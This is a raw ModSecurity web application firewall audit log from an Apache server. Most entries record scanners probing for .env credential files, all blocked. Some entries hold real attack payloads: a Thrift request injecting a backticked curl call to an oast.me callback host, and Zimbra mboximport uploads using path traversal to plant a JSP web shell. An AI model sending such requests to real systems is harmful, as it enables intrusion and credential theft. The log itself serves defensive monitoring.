Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --da522b1e-Z-- --79ca4d08-A-- [04/Jun/2025:22:22:27 +0700] aEBks1_DvM40jZomoktiMwAAAA8 103.236.140.4 38962 103.236.140.4 8181 --79ca4d08-B-- GET /.env.dev HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.66 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.66 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36 Accept-Charset: utf-8 --79ca4d08-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --79ca4d08-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749050547888581 929 (- - -) Stopwatch2: 1749050547888581 929; combined=381, p1=341, p2=0, p3=0, p4=0, p5=40, sr=120, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --79ca4d08-Z-- --d8b56c4a-A-- [04/Jun/2025:22:33:36 +0700] aEBnUDNXNn6zAsHj7JD1KwAAAFQ 103.236.140.4 39104 103.236.140.4 8181 --d8b56c4a-B-- GET /.env_sample HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.74 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.74 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; moto g(6)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --d8b56c4a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d8b56c4a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749051216598119 849 (- - -) Stopwatch2: 1749051216598119 849; combined=408, p1=369, p2=0, p3=0, p4=0, p5=39, sr=135, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d8b56c4a-Z-- --59117d51-A-- [04/Jun/2025:22:45:19 +0700] aEBqD9hPZJx8OfNaLCozawAAANI 103.236.140.4 39398 103.236.140.4 8181 --59117d51-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 164.90.228.79 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 164.90.228.79 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --59117d51-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --59117d51-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749051919476437 781 (- - -) Stopwatch2: 1749051919476437 781; combined=294, p1=264, p2=0, p3=0, p4=0, p5=30, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --59117d51-Z-- --12378505-A-- [04/Jun/2025:22:52:35 +0700] aEBrw5LmnxTwEPX7Iuag5gAAAJI 103.236.140.4 39428 103.236.140.4 8181 --12378505-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0 Safari/605.1.15 Accept-Charset: utf-8 --12378505-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --12378505-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749052355714356 851 (- - -) Stopwatch2: 1749052355714356 851; combined=334, p1=296, p2=0, p3=0, p4=0, p5=38, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --12378505-Z-- --2c17956d-A-- [04/Jun/2025:22:52:52 +0700] aEBr1DNXNn6zAsHj7JD1NwAAAEA 103.236.140.4 39430 103.236.140.4 8181 --2c17956d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36 Accept-Charset: utf-8 --2c17956d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2c17956d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749052372684640 854 (- - -) Stopwatch2: 1749052372684640 854; combined=377, p1=339, p2=0, p3=0, p4=0, p5=37, sr=129, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2c17956d-Z-- --9175d665-A-- [04/Jun/2025:23:17:17 +0700] aEBxjdhPZJx8OfNaLCozjwAAANc 103.236.140.4 39572 103.236.140.4 8181 --9175d665-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.87 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.87 X-Forwarded-Proto: https Connection: close User-Agent: Python-urllib/2.5 Accept-Charset: utf-8 --9175d665-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9175d665-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749053837543631 1275 (- - -) Stopwatch2: 1749053837543631 1275; combined=317, p1=280, p2=0, p3=0, p4=0, p5=37, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9175d665-Z-- --da482401-A-- [04/Jun/2025:23:20:30 +0700] aEByTthPZJx8OfNaLCozoQAAANI 103.236.140.4 39608 103.236.140.4 8181 --da482401-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 198.55.98.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 198.55.98.76 X-Forwarded-Proto: https Connection: close User-Agent: Nokia6630/1.0 (2.3.129) SymbianOS/8.0 Series60/2.6 Profile/MIDP-2.0 Configuration/CLDC-1.1 Accept-Charset: utf-8 --da482401-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --da482401-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749054030783221 827 (- - -) Stopwatch2: 1749054030783221 827; combined=323, p1=289, p2=0, p3=0, p4=0, p5=34, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --da482401-Z-- --00774a4b-A-- [04/Jun/2025:23:56:13 +0700] aEB6rV_DvM40jZomoktiTgAAAAE 103.236.140.4 39834 103.236.140.4 8181 --00774a4b-B-- POST /saas./resttosaasservlet HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 170 User-Agent: Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Content-Type: application/x-thrift X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 173729933 --00774a4b-C-- [1,"createSupportBundle",1,0,{"1":{"str":"1111"},"2":{"str":"`curl d0us2vpgpeonc6qdbef08cijh999th7z8.oast.me`"},"3":{"str":"value3"},"4":{"lst":["str",2,"AAAA","BBBB"]}}] --00774a4b-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --00774a4b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "TX:0=application/x-thrift"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1749056173136529 4292 (- - -) Stopwatch2: 1749056173136529 4292; combined=2326, p1=602, p2=1652, p3=19, p4=23, p5=30, sr=113, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --00774a4b-Z-- --a1b0fe28-A-- [04/Jun/2025:23:56:13 +0700] aEB6rTNXNn6zAsHj7JD1RAAAAEw 103.236.140.4 39844 103.236.140.4 8181 --a1b0fe28-B-- POST /service/extension/backup/mboximport?account-name=admin&account-status=1&ow=cmd HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 716 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586 content-type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 173596721 --a1b0fe28-C-- PK=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspȽ Â0à½OQ…!(¸U\ü[Ä;´t;ÛCSÏ$ÆKôñE×oUd.²öÁX&+Åi¸´ã¼;Àm³Ü>D>ËE•zØÜ?ÇÔ»®ê£PefñO@§÷†P‚÷d`㬾"Ÿ¨¾É€Ïˆ/þYƒ!òŸ•RzDBF©Ê¬XÿÿPK?Ý]…‰PK=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspȽ Â0à½OQ…!(¸U\ü[Ä;´t;ÛCSÏ$ÆKôñE×oUd.²öÁX&+Åi¸´ã¼;Àm³Ü>D>ËE•zØÜ?ÇÔ»®ê£PefñO@§÷†P‚÷d`㬾"Ÿ¨¾É€Ïˆ/þYƒ!òŸ•RzDBF©Ê¬XÿÿPK?Ý]…‰PK?Ý]…‰=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspPK?Ý]…‰=ð../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspPKÖà --a1b0fe28-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a1b0fe28-E-- --a1b0fe28-H-- Message: Access denied with code 403 (phase 2). Found 4 byte(s) in ARGS:PK\x03\x04\x14\x00\b\x00\b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 outside range: 1-255. 
[file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "95"] [id "210410"] [rev "4"] [msg "COMODO WAF: Invalid character in request||perpustakaan.smkn22jakarta.sch.id|F|3"] [data "ARGS:PK\x5cx03\x5cx04\x5cx14\x5cx00\x5cb\x5cx00\x5cb\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00=\x00\x00\x00../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jsp\x1c\xc8\xbd\x0a\xc20\x10\x00\xe0\xbdOQ\x02\x85\x04!(\xb8U\x5c\xfc[\xc4\x16;\xb4t;\xdbCS\xcf$\xc6K\xf4\xf1E\xd7oUd.\xb2\xf6\xc1X"] [severity "ERROR"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749056173136962 5172 (- - -) Stopwatch2: 1749056173136962 5172; combined=3593, p1=432, p2=3126, p3=0, p4=0, p5=35, sr=72, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a1b0fe28-Z-- --77728c74-A-- [04/Jun/2025:23:56:13 +0700] aEB6rdhPZJx8OfNaLCoz0gAAAMI 103.236.140.4 39840 103.236.140.4 8181 --77728c74-B-- POST /service/extension/backup/mboximport?account-name=admin&ow=2&no-switch=1&append=1 HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 716 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:135.0) Gecko/20100101 Firefox/135.0 content-type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62, 103.236.140.4 Cookie: X-Varnish: 173596724 --77728c74-C-- PK=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspȽ Â0à½OQ…!(¸U\ü[Ä;´t;ÛCSÏ$ÆKôñE×oUd.²öÁX&+Åi¸´ã¼;Àm³Ü>D>ËE•zØÜ?ÇÔ»®ê£PefñO@§÷†P‚÷d`㬾"Ÿ¨¾É€Ïˆ/þYƒ!òŸ•RzDBF©Ê¬XÿÿPK?Ý]…‰PK=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspȽ Â0à½OQ…!(¸U\ü[Ä;´t;ÛCSÏ$ÆKôñE×oUd.²öÁX&+Åi¸´ã¼;Àm³Ü>D>ËE•zØÜ?ÇÔ»®ê£PefñO@§÷†P‚÷d`㬾"Ÿ¨¾É€Ïˆ/þYƒ!òŸ•RzDBF©Ê¬XÿÿPK?Ý]…‰PK?Ý]…‰=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspPK?Ý]…‰=ð../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspPKÖà --77728c74-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --77728c74-H-- Message: Access denied with code 403 (phase 2). Found 4 byte(s) in ARGS:PK\x03\x04\x14\x00\b\x00\b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 outside range: 1-255. 
[file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "95"] [id "210410"] [rev "4"] [msg "COMODO WAF: Invalid character in request||perpustakaan.smkn22jakarta.sch.id|F|3"] [data "ARGS:PK\x5cx03\x5cx04\x5cx14\x5cx00\x5cb\x5cx00\x5cb\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00=\x00\x00\x00../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jsp\x1c\xc8\xbd\x0a\xc20\x10\x00\xe0\xbdOQ\x02\x85\x04!(\xb8U\x5c\xfc[\xc4\x16;\xb4t;\xdbCS\xcf$\xc6K\xf4\xf1E\xd7oUd.\xb2\xf6\xc1X"] [severity "ERROR"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749056173155108 4626 (- - -) Stopwatch2: 1749056173155108 4626; combined=3482, p1=468, p2=2982, p3=0, p4=0, p5=32, sr=162, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --77728c74-Z-- --82631c57-A-- [04/Jun/2025:23:57:54 +0700] aEB7EthPZJx8OfNaLCoz1gAAAMs 103.236.140.4 39866 103.236.140.4 8181 --82631c57-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.216 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.216 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 12_0 like Mac OS X) AppleWebKit/604.1.34 (KHTML, like Gecko) CriOS/67.0.3396.69 Mobile/16A366 Safari/604.1 Accept-Charset: utf-8 --82631c57-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --82631c57-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749056274701322 740 (- - -) Stopwatch2: 1749056274701322 740; combined=287, p1=251, p2=0, p3=0, p4=0, p5=36, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --82631c57-Z-- --0265fc35-A-- [05/Jun/2025:00:16:12 +0700] aEB_XNhPZJx8OfNaLCo0BAAAANE 103.236.140.4 40012 103.236.140.4 8181 --0265fc35-B-- GET /.env HTTP/1.0 Host: petruk.hauganslekt.no X-Real-IP: 165.22.34.189 X-Forwarded-Host: petruk.hauganslekt.no X-Forwarded-Server: petruk.hauganslekt.no X-Forwarded-For: 165.22.34.189 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --0265fc35-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0265fc35-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749057372516836 866 (- - -) Stopwatch2: 1749057372516836 866; combined=328, p1=285, p2=0, p3=0, p4=0, p5=43, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0265fc35-Z-- --600b8a48-A-- [05/Jun/2025:00:57:40 +0700] aECJFNhPZJx8OfNaLCo0WAAAANY 103.236.140.4 40614 103.236.140.4 8181 --600b8a48-B-- GET /.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 138.68.82.23 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Go-http-client/1.1 Cookie: X-Forwarded-For: 138.68.82.23 Accept-Encoding: gzip X-Varnish: 172997943 --600b8a48-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --600b8a48-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749059860940374 790 (- - -) Stopwatch2: 1749059860940374 790; combined=341, p1=300, p2=0, p3=0, p4=0, p5=41, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --600b8a48-Z-- --bf04696c-A-- [05/Jun/2025:00:57:50 +0700] aECJHjNXNn6zAsHj7JD1WgAAAFU 103.236.140.4 40666 103.236.140.4 8181 --bf04696c-B-- GET /.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 138.197.191.87 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Go-http-client/1.1 Cookie: X-Forwarded-For: 138.197.191.87 Accept-Encoding: gzip X-Varnish: 172997966 --bf04696c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --bf04696c-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749059870208491 713 (- - -) Stopwatch2: 1749059870208491 713; combined=321, p1=283, p2=0, p3=0, p4=0, p5=37, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bf04696c-Z-- --0456cf36-A-- [05/Jun/2025:02:02:13 +0700] aECYNdhPZJx8OfNaLCo0pAAAAMo 103.236.140.4 41410 103.236.140.4 8181 --0456cf36-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 164.92.253.3 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 164.92.253.3 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; SAMSUNG-SM-G891A) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --0456cf36-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0456cf36-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749063733843011 871 (- - -) Stopwatch2: 1749063733843011 871; combined=371, p1=330, p2=0, p3=0, p4=0, p5=41, sr=106, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0456cf36-Z-- --f313e21e-A-- [05/Jun/2025:02:23:55 +0700] aECdS1_DvM40jZomoktimgAAAAM 103.236.140.4 41580 103.236.140.4 8181 --f313e21e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.87.59 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.87.59 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; Redmi Note 5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Mobile Safari/537.36 Accept-Charset: utf-8 --f313e21e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f313e21e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749065035411966 859 (- - -) Stopwatch2: 1749065035411966 859; combined=346, p1=307, p2=0, p3=0, p4=0, p5=39, sr=95, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f313e21e-Z-- --22aa7c61-A-- [05/Jun/2025:02:56:10 +0700] aECk2l_DvM40jZomoktiuQAAAAE 103.236.140.4 41774 103.236.140.4 8181 --22aa7c61-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.73.96 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.73.96 X-Forwarded-Proto: https Connection: close User-Agent: Jigsaw/2.2.5 W3C_CSS_Validator_JFouffa/2.0 Accept-Charset: utf-8 --22aa7c61-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --22aa7c61-H-- Message: Access denied with code 403 (phase 1). 
